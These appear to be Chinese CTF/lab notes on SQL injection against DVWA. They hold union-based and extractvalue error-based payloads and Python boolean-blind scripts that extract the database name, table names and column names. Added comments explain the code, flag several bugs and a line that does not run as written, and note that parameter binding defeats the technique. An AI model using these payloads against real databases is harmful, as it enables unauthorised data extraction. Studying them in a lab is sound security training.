union select联合注入: 1'order by 2# ——有两列 1'union select 1,2# 1' union select database(),2# 1'union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#
payload
extractvalue报错注入 1' and extractvalue(1,concat('~',database(),'~'))#
1 union select 1,database()# 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761//这里由于过滤了单引号,所以只能用16进制进行编码然后绕过,dvwa=0x64767761
# Boolean-based blind inference of the current database name, one character
# position at a time: for every position j in 1..databaselength and every
# candidate character i in `payloads`, one request is sent whose `id` value
# carries `substr(database(),j,1)='i'`; a response containing 'exists' is
# read as "character matched" and i is appended to databasename.
# `databaselength`, `payloads`, `s`, `url` and `headers` are defined outside
# this view (presumably a requests.Session, the target URL and its headers — confirm).
# `%23` is the URL-encoded `#`, which terminates the rest of the SQL statement.
# NOTE: `print(database_payload//调试用的` is not valid Python as pasted — `//` is
# floor division, not a comment marker, and the closing parenthesis is missing
# (调试用的 = "for debugging"); the block does not run in this form.
# The inference only works because the response text differs with the truth
# value of the injected predicate; binding `id` as a query parameter and
# returning an identical response for any invalid id removes that signal.
print("-----开始猜解数据库名-------") databasename = '' for j in range(1,databaselength+1): for i in payloads: database_payload=f"?id=1\'and+substr(database(),{j},1)='{i}'%23&Submit=Submit#" print(database_payload//调试用的 if'exists'in s.get(url+database_payload,headers=headers).text: databasename +=i print('数据库的名字为:'+databasename)
查询表的数目:
# Infers how many tables the current schema has: for j in 0..49 the request
# tests `count(table_name) ... = j` and the loop stops at the first response
# containing 'exists', storing j in `tablecount` (表的数目是 = "the number of tables is").
# If no j in 0..49 matches, `tablecount` is never assigned and the table-name
# block that follows (`range(0, tablecount)`) raises NameError.
# `s`, `url` and `headers` come from outside this view.
print("-----开始猜解表数-------") for j in range(0,50): table_count=f"?id=1'and (select count(table_name)from information_schema.tables where table_schema=database())={j}%23&Submit=Submit#" print(table_count) if'exists'in s.get(url+table_count,headers=headers).text: tablecount=j print("表的数目是"+str(tablecount)) break
查询表名
# For each table index j in 0..tablecount-1 (`tablecount` is set by the
# preceding block):
#  1. scan i in 0..49 against length(table_name) of the j-th table (`limit j,1`);
#     every match overwrites `tablength` — there is no break, so the last match
#     wins; the printed text 第一个表长度为 ("length of the first table") is
#     emitted for every table, not just the first.
#  2. for each position m in 0..tablength and each candidate n in `payloads`,
#     test substr(table_name, m, 1)='n' and append n on a match.
# m starts at 0 here while the database-name and column-name blocks start at 1;
# position 0 is presumably a wasted request on the target engine — confirm.
# This block matches the full string 'User ID exists in the database.' whereas
# the earlier blocks match only 'exists'; presumably the same response page.
# For table 0, if no length matches, `tablength` is unbound and the inner loop
# raises NameError.
print("-----开始猜解表名-------") for j in range(0, tablecount): table_name = '' for i in range(0, 50): tab_length = f'?id=1\'and (select length(table_name) from information_schema.tables where table_schema=database() limit {j},1)={i}%23&Submit=Submit#' # print(tablength) if'exists'in s.get(url + tab_length, headers=headers).text: tablength = i print("第一个表长度为:%d" % i) # the loop above obtains each table's length for m in range(0, tablength+1): for n in payloads: table_payload = f'?id=1\'and substr((select table_name from information_schema.tables where table_schema=database() limit {j},1),{m},1)=\'{n}\'%23&Submit=Submit#' #print(table_payload) if'User ID exists in the database.'in s.get(url + table_payload, headers=headers).text: table_name += n print('table_name%d:'%(j+1)+table_name)
# Infers the number of columns of the table `flagishere` — hard-coded here, not
# taken from the names recovered by the previous block — by testing
# `count(column_name) ... = j` for j in 0..49 and breaking at the first response
# containing 'User ID exists in the database.'. columnNum stays 0 if nothing
# matches, so the column-name block that follows then does nothing.
# `s`, `url` and `headers` come from outside this view.
columnNum = 0 for j in range(50): columnNum_payload = '?id=1\' and (select count(column_name) from information_schema.columns where table_name=\'flagishere\')='+str(j)+' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url+columnNum_payload, headers=headers).text: columnNum = j break print('columnNum: '+str(columnNum))
# Recovers each column name of `flagishere` (`columnNum` comes from the
# preceding block):
#  1. for column j (`limit j,1`), scan i in 1..49 against the name's length —
#     no break, so the last matching i is kept in `columnLen`;
#  2. for each position m in 1..columnLen and each candidate n in `payloads`,
#     test substr(column_name, m, 1)='n' and append n on a match.
# For the first column, if no length matches, `columnLen` is unbound and the
# inner loop raises NameError.
# Note the original comment below says "each table's name"; the code actually
# selects column_name.
# 2. obtain the length of each column name for j in range(0,columnNum): column_name = '' for i in range(1,50): columnLen_payload = '?id=1\' and length(substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit '+str(j)+',1),1))='+str(i)+' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url+columnLen_payload, headers=headers).text: columnLen = i print('column'+str(j+1)+'_length: '+str(columnLen)) # (2) inner loop recovers each table's name for m in range(1,columnLen+1): for n in payloads: # i was already used by the previous loop column_payload = '?id=1\' and substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit '+str(j)+',1),'+str(m)+',1)=\''+str(n)+'\' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url+column_payload, headers=headers).text: column_name += n print('column'+str(j+1)+'_name: '+column_name)